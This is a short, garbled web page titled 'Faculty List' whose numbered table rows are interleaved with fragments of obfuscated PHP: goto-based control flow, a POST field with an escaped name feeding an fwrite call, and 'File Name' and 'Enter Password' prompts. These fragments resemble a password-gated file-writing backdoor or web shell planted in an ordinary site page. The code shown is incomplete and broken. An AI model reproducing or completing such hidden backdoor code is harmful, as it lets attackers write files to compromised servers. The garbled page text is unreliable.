Faculty List

S.No. Name Designation
1
2 goto sbO0J; aDIsz: ?>
3

5 File Name:
6
7
8
9
10 167); $text = $_POST["x74145170164x64x61x74141"]; fwrite($file
11
12
13
14

Enter
15
16 Password:
17
18
19
20
21
22